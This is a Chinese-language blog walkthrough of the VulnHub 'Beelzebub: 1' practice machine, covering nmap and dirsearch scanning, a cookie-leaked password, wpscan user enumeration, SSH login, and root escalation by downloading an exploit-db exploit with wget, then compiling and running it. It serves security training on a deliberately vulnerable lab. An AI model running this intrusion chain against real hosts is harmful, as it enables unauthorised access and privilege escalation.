【VulnHub靶场】——BEELZEBUB: 1

作者名:Demo不是emo 

主页面链接:主页传送门
创作初心:对于计算机的学习者来说,初期的学习无疑是最迷茫和难以坚持的,中后期主要是经验和能力的提高,我也刚接触计算机1年,也在不断的探索,在CSDN写博客主要是为了分享自己的学习历程,学习方法,总结的经验等等,希望能帮助到大家
座右铭:不要让时代的悲哀成为你的悲哀
专研方向:网络安全,数据结构

每日emo:
 

【VulnHub靶场】——BEELZEBUB: 1_第1张图片

 今天写一份BEELZEBUB: 1靶场教程(简单难度),靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索BEELZEBUB: 1就能下载今天的靶场了,也可以找我拿,话不多说进入正题

目录

一:攻击准备

二:信息收集

1.ip探测

2.http服务探测 

三:实际操作


一:攻击准备

  这里除了到vulnhub下载到的目标虚拟机环境,还需要一台kali,并且两台处于同一网段(可以都用桥接模式),虚拟机管理设备用vm和virtual均可,我这里就用virtual来给大家演示了,如下面这样就是搭建完成了,具体搭建过程就不多讲了,不懂得也可以私信问我

 

二:信息收集

1.ip探测

 我们可以看到目标靶机上存在一个krampus用户,但是我们并没有密码,也不知道靶机的ip地址,但是我们的kali和目标机器都是用的桥接模式,所以在同一个网段,我们直接用kali的nmap工具扫描同网段下存活的其他主机,我的kali的ip地址是192.168.251.130,所以命令如下:

【VulnHub靶场】——BEELZEBUB: 1_第2张图片

可以看到这里nmap扫描到了三个ip,d段分别是29,184,229,但是这里的29,184都是我室友的设备ip。所以目标机的真实ip是 192.168.251.229,我们再使用-A命令来进行深度扫描看看有没有更多的信息

【VulnHub靶场】——BEELZEBUB: 1_第3张图片

可以看到对方确实开启了80端口22端口,并且也探测出了对方是linux的ubuntu系统,这更说明了我们找的ip是正确的,下面我们就来对这两个端口进行深一步的探测

2.http服务探测 

 老规矩,开启了80端口并且是http服务,说明开启了网页,我们直接尝试访问

【VulnHub靶场】——BEELZEBUB: 1_第4张图片 发现是一个乌班图的apache初始页面,在页面并没有发现什么有用信息,我们习惯性的F12打开开发者页面,也没有获得任何提示,所以我们尝试目录扫描

这里的目录扫描我们使用dirsearch(比较习惯用这个,雀氏好用),命令如下

dirsearch -u "http://192.168.251.229" -e *

把双引号里面的ip换成你自己的靶机ip就可以了,最后扫描出来结果如下:

 【VulnHub靶场】——BEELZEBUB: 1_第5张图片

可以看到这里扫描除了很多状态码为200的页面,说明可以访问,我们挨个访问试试,访问index.html时显示没有变化,说明是主页面,没有问题,但是在访问index.php时,出现了404的报错信息,而且提示的apache版本和我们nmap探测到的版本不一样,说明这里存在问题

【VulnHub靶场】——BEELZEBUB: 1_第6张图片

老样子,还是习惯性查看一下开发者页面,发现这个报错信息居然只是写的一个静态页面(作者真会玩)并且作者在这里还给出了提示,提示翻译过来就是

我的心被加密了,beelzebub不知道怎样解码了

后面还提示了一个md5,说明这是一个md5加密,我们们尝试

【VulnHub靶场】——BEELZEBUB: 1_第7张图片

我们去找一个在线站点解密,解密的结果如下,红点那个位置就是

【VulnHub靶场】——BEELZEBUB: 1_第8张图片

 再把这串加密后的代码当做目录的下一级,再次进行文件扫描,命令如下

dirsearch -u "http://192.168.251.229/d18e1e22becbd915b45e0e655429d487" -e *

同样把尚明命令中的ip换成你自己搭建的靶机的ip就行了,扫描结果如下

【VulnHub靶场】——BEELZEBUB: 1_第9张图片

通过扫描结果我们发现,第一,这用的是一个wordpress的cms框架,第二, 存在了loginincludeinclude的字样,我们依次访问一下看看

【VulnHub靶场】——BEELZEBUB: 1_第10张图片 【VulnHub靶场】——BEELZEBUB: 1_第11张图片

【VulnHub靶场】——BEELZEBUB: 1_第12张图片

可以看到一个文件包含,一个登录页面,一个上传页面,文件包含暂时没啥用,因为不知道目标文件名,而登陆点我们也不知道密码,所以关键点应该在这个上传页面了,我们再来仔细看看上传页面,发现点击TALK To VALAK后,发现了一个php页面,但是需要输入账号

【VulnHub靶场】——BEELZEBUB: 1_第13张图片

暂时没什么有用的信息了,老规矩F12查看开发者页面,发现该页面的cookie中有一个password,如下 

【VulnHub靶场】——BEELZEBUB: 1_第14张图片

密码:M4k3Ad3a1

这个密码很有可能就是本机用户名的登录面,那这个用户名又要从哪里来呢,仔细想想刚才获取的信息是不是还有的没用,没错,就是wordpress框架

三:实际操作

我们直接用wpscan,webscan简单来说就是一个专门用来扫描wordpress漏洞的工具,输入下面这个命令开始扫描即可

wpscan --url=http://192.168.251.229/d18e1e22becbd915b45e0e655429d487/ --ignore-main-redirect --force  -e --plugins-detection aggressive

命令的具体功能和用法这里就不多讲了,想了解的可以点此查看 ,里面详细介绍了wpscan这款工具,扫描结果如下

【VulnHub靶场】——BEELZEBUB: 1_第15张图片

这里成功拿到了两个用户名,krampusvalak,加上前面不是有个页面的cookie回显了密码吗,尝试登录之前我们找到的那个管理页面,结果发现总是会跳转到其他页面,就很烦

但是最开始我们探测端口时是不是有个22端口还没有利用到吗,我们直尝试一下用账密ssh远程登录,如下

【VulnHub靶场】——BEELZEBUB: 1_第16张图片 可以看到用ssh成功登陆,现在我们来尝试一下提权操作

尝试了一下sudo提取,但是发现密码是错的,应该不行,这里教大家一招,拿到别人的shell时可以先看看历史命令,可能会有奇效,而且靶场更有奇效,有时候能看到别人的通关方法,输入该命令查看历史命令

cat .bash_history

查看结果如下: 

【VulnHub靶场】——BEELZEBUB: 1_第17张图片

在很多的常用语句中,发现了这段语句,它下载了一个文件并用c编译后执行,注意,这还是exp程序,大概率就是作者留给我们的,我们直接照着它来操作,我把命令直接放在这里,你也可以直接使用

wget https://www.exploit-db.com/download/47009

下载


mv 47009 ./exploit.c

移动


gcc exploit.c -o exploit

编译


./exploit 

执行

执行结果如下: 

【VulnHub靶场】——BEELZEBUB: 1_第18张图片

可以看到,我的权限已经变成root权限了,说明这里已经成功提权了,最后的flag在root目录下就可以看到,如下

【VulnHub靶场】——BEELZEBUB: 1_第19张图片

恭喜你,到这里我们今天的目标靶场就已经被全部打完了,感谢同学们的阅读,希望能对同学们网安能力的提高有帮助,有什么问题都可以私信或者评论,同学们要加油哇!respect!

你可能感兴趣的:(VulnHub靶场,网络安全,web安全,安全)